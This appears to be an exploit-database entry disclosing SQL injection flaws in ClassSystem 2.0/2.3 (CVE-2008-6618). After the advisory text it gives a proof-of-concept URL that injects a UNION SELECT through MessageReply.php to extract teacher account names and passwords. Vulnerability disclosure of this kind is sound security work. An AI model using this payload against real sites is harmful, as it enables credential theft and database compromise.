ClassSystem 2.0/2.3 - 'MessageReply.php?teacher_id' SQL Injection

Author: Unohope
type: webapps
platform: php
port: 
date_added: 2008-05-26  
date_updated: 2014-02-23  
verified: 1  
codes: CVE-2008-6618;OSVDB-45641  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 31848.txt  
source: https://www.securityfocus.com/bid/29372/info

ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.

Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.

ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable.

http://www.example.com/class/MessageReply.php?teacher_id=1&message_id=-99'+union+select+teacher_account,teacher_password,3,4+from+teacher/*